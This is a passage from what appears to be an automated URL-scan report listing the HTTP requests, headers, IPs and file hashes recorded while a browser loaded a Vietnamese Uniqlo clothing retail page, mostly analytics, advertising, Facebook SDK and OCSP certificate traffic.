Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 301 Moved Permanently
Location: https://connect.facebook.net/en_US/sdk.js
Content-Type: text/plain
Server: proxygen-bolt
Date: Sat, 03 Dec 2022 15:04:32 GMT
Connection: keep-alive
Content-Length: 0
www.google-analytics.com/analytics.js
142.250.74.110200 OK 20 kB URL HTTP/1.1 www.google-analytics.com/analytics.js
IP 142.250.74.110:0
File type ASCII text, with very long lines (1325)
Hash 47e6f374ca946fddd5b59871b325736c
baa9282efc8785e84d247c3bff518eaa45f101c4
16580b5c87c58e5702e411f1888fdef511094e4cd6d62bb47d16291ffb25985e
GET /analytics.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 20039
Date: Sat, 03 Dec 2022 14:23:03 GMT
Expires: Sat, 03 Dec 2022 16:23:03 GMT
Cache-Control: public, max-age=7200
Age: 2489
Last-Modified: Tue, 27 Sep 2022 22:01:05 GMT
Content-Type: text/javascript
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash 1cb565003a19a78fd973caebb16a92cc
2870af258aff4fe8b0062cd85a357fcf4645ede9
db52d90aa836b459545746204f9e1403aa0023f56d857cbe75d581447e2a9468
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
142.250.74.130200 OK 52 kB URL HTTP/1.1 pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
IP 142.250.74.130:0
File type ASCII text, with very long lines (4885)
Hash 79d2d08a6b39e7d1c6bb1b6d69574dac
45ba9cce286bd808f2f63ae276c094d01ef38eb4
34334d401abebb713acf6defa8e43eab3932fc4f2d79ea375eb8cbe4fb0a2d8c
GET /pagead/js/adsbygoogle.js HTTP/1.1
Host: pagead2.googlesyndication.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/
HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Vary: Accept-Encoding
Date: Sat, 03 Dec 2022 15:04:32 GMT
Expires: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
ETag: 14029138062855232562
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 51613
X-XSS-Protection: 0
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 933bd2bc7dd004d74961dfc0878c1d22
8a4f50edb54fea8ffa604f5ca593345341ce15a1
252363badd64d5ec8ad9eb56af41e44bb094d8c80646dd228e90dba5e56c87b8
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6244
Cache-Control: max-age=138875
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Etag: "638ac897-1d7"
Expires: Mon, 05 Dec 2022 05:39:07 GMT
Last-Modified: Sat, 03 Dec 2022 03:55:03 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 471
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash 1cb565003a19a78fd973caebb16a92cc
2870af258aff4fe8b0062cd85a357fcf4645ede9
db52d90aa836b459545746204f9e1403aa0023f56d857cbe75d581447e2a9468
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 471 B IP 142.250.74.131:0
Hash 4bd6e9dbab52574ed6a57755850845d3
2023796487837093cbb74915bccf4c01af0d1082
e5cda570ffc3b87673a243cd6a3dbe293e749c379e11584a4eca633e884cb1b2
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
apis.google.com/js/platform.js?onload=renderOptIn
172.217.21.174200 OK 21 kB URL HTTP/2 apis.google.com/js/platform.js?onload=renderOptIn
IP 172.217.21.174:0
File type ASCII text, with very long lines (1279)
Hash 21ced795a61792cb8562e6ec51b27ada
e8363caceae252b78746705265d41c84b0224515
7a2cf4c49a307875b2c7e0c03d9bf72ae58c88a980eb024811350f312779153a
GET /js/platform.js?onload=renderOptIn HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: text/javascript
access-control-allow-origin: *
content-security-policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gapi-team
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="gapi-team"
report-to: {"group":"gapi-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gapi-team"}]}
timing-allow-origin: *
content-length: 20986
date: Sat, 03 Dec 2022 15:04:32 GMT
expires: Sat, 03 Dec 2022 15:04:32 GMT
cache-control: private, max-age=1800, stale-while-revalidate=1800
etag: "a7c094b213682aff"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 933bd2bc7dd004d74961dfc0878c1d22
8a4f50edb54fea8ffa604f5ca593345341ce15a1
252363badd64d5ec8ad9eb56af41e44bb094d8c80646dd228e90dba5e56c87b8
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 6244
Cache-Control: max-age=138875
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Etag: "638ac897-1d7"
Expires: Mon, 05 Dec 2022 05:39:07 GMT
Last-Modified: Sat, 03 Dec 2022 03:55:03 GMT
Server: ECS (ska/F715)
X-Cache: HIT
Content-Length: 471
apis.google.com/js/platform.js
172.217.21.174200 OK 21 kB URL HTTP/2 apis.google.com/js/platform.js
IP 172.217.21.174:0
File type ASCII text, with very long lines (1279)
Hash 7ac44ef24e267df17ff72f195b252806
62db12d9ce11a576ccd7fa3544d851c5fd42f3b7
aae7897e7b55999c1b3166309381d19ac488dced51e14071339d8b193a686a61
GET /js/platform.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: text/javascript
access-control-allow-origin: *
content-security-policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gapi-team
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="gapi-team"
report-to: {"group":"gapi-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gapi-team"}]}
timing-allow-origin: *
content-length: 20984
date: Sat, 03 Dec 2022 15:04:32 GMT
expires: Sat, 03 Dec 2022 15:04:32 GMT
cache-control: private, max-age=1800, stale-while-revalidate=1800
etag: "7446758f13887885"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.googleadservices.com/pagead/conversion/952322391/?random=1670079868312&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&rfmt=3&fmt=4
142.250.74.130200 OK 1.1 kB URL HTTP/2 www.googleadservices.com/pagead/conversion/952322391/?random=1670079868312&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&rfmt=3&fmt=4
IP 142.250.74.130:0
File type ASCII text, with very long lines (1899), with no line terminators
Hash 4d57361dd5c03f60eb4fbb946697a6d2
abea3eb6457f7963196e60836cc773b56be5d909
49da7e987da46a4048e24cf4ca3a9ee8a73fdd4854bad39717c27af23d15491a
GET /pagead/conversion/952322391/?random=1670079868312&cv=9&fst=1670079868312&num=1&label=VPBwCLuA5GcQ15KNxgM&bg=ffffff&hl=en&guid=ON&resp=GooglemKTybQhCsO&eid=375603260&u_h=1024&u_w=1280&u_ah=1002&u_aw=1280&u_cd=24&u_his=1&u_tz=0&u_java=false&u_nplug=0&u_nmime=0&sendb=1&ig=1&frm=0&url=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&tiba=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&hn=www.googleadservices.com&rfmt=3&fmt=4 HTTP/1.1
Host: www.googleadservices.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
content-type: text/javascript; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: br
server: cafe
content-length: 1125
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
connect.facebook.net/en_US/fbevents.js
31.13.72.12200 OK 27 kB URL HTTP/2 connect.facebook.net/en_US/fbevents.js
IP 31.13.72.12:0
File type ASCII text, with very long lines (64348)
Hash 44ecaa3c2a4929a40141edc4540aaf84
f29a573182333b2500d41bfc389d6c5232dfb348
6589fe14578dedd4df678a909afadd7e5bc7f57c7e3e24518a7f5faac7383396
GET /en_US/fbevents.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-type: application/x-javascript; charset=utf-8
x-fb-rlafr: 0
document-policy: force-load-at-top
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: public
cache-control: public, max-age=1200
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: 6otDX2NhS64wGyQKwcLHjh+52qWw3R4n33mICAL0Y7450+SWpdWlRedVSLDgqt/LOIZk1NmReleDgniJ1tNzLQ==
content-length: 27340
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:32 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
connect.facebook.net/en_US/sdk.js
31.13.72.12200 OK 1.7 kB URL HTTP/2 connect.facebook.net/en_US/sdk.js
IP 31.13.72.12:0
File type ASCII text, with very long lines (1957)
Hash a0dcac66b97a10168717fc008abb2fa8
9f8f30a07fba5db468c452a4597dd4e42827ca00
fe0ee3a26a7c5acbaf86980f3fc96d135221a17b81c8a2d81ef29cfc483c402c
GET /en_US/sdk.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://uniqlonhat.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
access-control-expose-headers: X-FB-Content-MD5
x-fb-content-md5: 79110d0b626290b1bdc49e2c653aeeaa
etag: "26d8817fe5a21eea50bccbe09fb1c37a"
content-type: application/x-javascript; charset=utf-8
timing-allow-origin: *
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
expires: Sat, 03 Dec 2022 15:18:22 GMT
cache-control: public,max-age=1200,stale-while-revalidate=3600
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
x-fb-rlafr: 0
x-frame-options: DENY
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-md5: oNysZrl6EBaHF/wAirsvqA==
x-fb-debug: LXH1cSPPQ6N1dFzPSkGFSBTKTRq3VTu2RkC0up9R0gro0XL8A+TdAfOmRc/QgakO8xZ/b57s9wbusRuo5TFKDw==
content-length: 1689
x-fb-trip-id: 1904183273
date: Sat, 03 Dec 2022 15:04:32 GMT
alt-svc: h3=":443"; ma=86400
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash e63a3fb1ef1a4ebbbd126969d6ee68ca
8bc9c26950b3899087e25ddea159c28f57b47200
f2ec30377e239f64286ae7dde8032e4e332b6c123f7decc07126fbbcff460a69
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash baaba92c2ccd740f080a25a9ea5cb3ad
3322d5a9fb0b3a2ec83247eac9865234cbcefece
5150dcbc7293378fff4a337fd0f61bdbbf6b4f64bddba6d0fd270be37e81fe07
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 1377c2956f6d4d989e6fafbe01600b49
7a550dd67e42a8f1ba1468646af02691d0580345
4e0206cd8e1112cdefa7f974876461a968bbcbbf016b1b1c2e3af77346507886
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.google-analytics.com/j/collect?v=1&_v=j98&a=275869444&t=pageview&_s=1&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&ul=en-us&de=UTF-8&dt=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&sd=24-bit&sr=1280x1024&vp=1268x939&je=0&_u=IEBAAEABAAAAACAAI~&jid=77059531&gjid=1926687460&cid=1519869217.1670079870&tid=UA-26887643-3&_gid=1271405448.1670079870&_r=1&_slc=1&z=230856038
142.250.74.110200 OK 4 B URL HTTP/2 www.google-analytics.com/j/collect?v=1&_v=j98&a=275869444&t=pageview&_s=1&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&ul=en-us&de=UTF-8&dt=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&sd=24-bit&sr=1280x1024&vp=1268x939&je=0&_u=IEBAAEABAAAAACAAI~&jid=77059531&gjid=1926687460&cid=1519869217.1670079870&tid=UA-26887643-3&_gid=1271405448.1670079870&_r=1&_slc=1&z=230856038
IP 142.250.74.110:0
File type ASCII text, with no line terminators
Hash 9e92e190700c1af4539b40c2171320a9
209bcdb79e6067b51091ce8586d4b977f25b67d8
aec60bc104db041b1512185839f18f52986df7e569e5445f740dd60f763fbca8
POST /j/collect?v=1&_v=j98&a=275869444&t=pageview&_s=1&dl=http%3A%2F%2Funiqlonhat.com%2Fao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933%2F&ul=en-us&de=UTF-8&dt=%C3%81o%20len%20n%E1%BB%AF%20c%E1%BB%95%20tim%20Uniqlo%20Merino%20-%20Uniqlo%202016%20(151933)%20-%20UNI%20JAPAN&sd=24-bit&sr=1280x1024&vp=1268x939&je=0&_u=IEBAAEABAAAAACAAI~&jid=77059531&gjid=1926687460&cid=1519869217.1670079870&tid=UA-26887643-3&_gid=1271405448.1670079870&_r=1&_slc=1&z=230856038 HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: http://uniqlonhat.com
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: http://uniqlonhat.com
date: Sat, 03 Dec 2022 15:04:32 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
content-type: text/plain
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 4
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
uniqlonhat.com/wp-content/uploads/2015/05/UNIQLONHAT.com_mini_logo.png
103.28.36.212200 OK 771 B URL HTTP/1.1 uniqlonhat.com/wp-content/uploads/2015/05/UNIQLONHAT.com_mini_logo.png
IP 103.28.36.212:0
ASN #131353 NhanHoa Software company
File type PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced\012- data
Hash 8325084f1419e098d8b560da10834da4
fc7b5288873f39640c60e3e8d52fe05e511b0e38
22b6a119cb4c468c22785ec428bd719bfb09033f1fe34f80474318c023c90463
GET /wp-content/uploads/2015/05/UNIQLONHAT.com_mini_logo.png HTTP/1.1
Host: uniqlonhat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://uniqlonhat.com/ao-len-nu-co-tim-uniqlo-merino-uniqlo-2016-151933/
Cookie: dwqa_anonymous=TcXdAdRNPlj1Pet9p95XeuZLtnyoVe59kMQiltbmRFu
HTTP/1.1 200 OK
Connection: Keep-Alive
Cache-Control: public, max-age=604800
Expires: Sat, 10 Dec 2022 15:04:29 GMT
Content-Type: image/png
Last-Modified: Thu, 26 Mar 2020 04:00:46 GMT
Accept-Ranges: bytes
Content-Length: 771
Date: Sat, 03 Dec 2022 15:04:29 GMT
Server: LiteSpeed
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash 99c6e888e109cfca37de80b29e284001
3082cf79c611491ae64e5599f55e9e4908c457a6
19503ecb247142c34038b8ac5e0a5ab5bc7d94ef205beb3edde394275010e15f
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.131200 OK 472 B IP 142.250.74.131:0
Hash baaba92c2ccd740f080a25a9ea5cb3ad
3322d5a9fb0b3a2ec83247eac9865234cbcefece
5150dcbc7293378fff4a337fd0f61bdbbf6b4f64bddba6d0fd270be37e81fe07
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Dec 2022 15:04:32 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.gstatic.com/images/branding/product/1x/translate_24dp.png
142.250.74.35200 OK 846 B URL HTTP/2 www.gstatic.com/images/branding/product/1x/translate_24dp.png
IP 142.250.74.35:0
File type PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced\012- data
Hash e9cd262114358f26b7608b56905185dc
6dbde0a96deaab2b529723ce26c62043cf9180ab
5a861509b658aa24fc3aed2867ac3c061e7d818d90b9990959afc6d1b5d4ff99
GET /images/branding/product/1x/translate_24dp.png HTTP/1.1
Host: www.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://uniqlonhat.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Origin
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 846
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 03 Dec 2022 14:22:28 GMT
expires: Sun, 03 Dec 2023 14:22:28 GMT
cache-control: public, max-age=31536000
last-modified: Thu, 14 Oct 2021 09:08:00 GMT
content-type: image/png
age: 2524
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash 933bd2bc7dd004d74961dfc0878c1d22
8a4f50edb54fea8ffa604f5ca593345341ce15a1
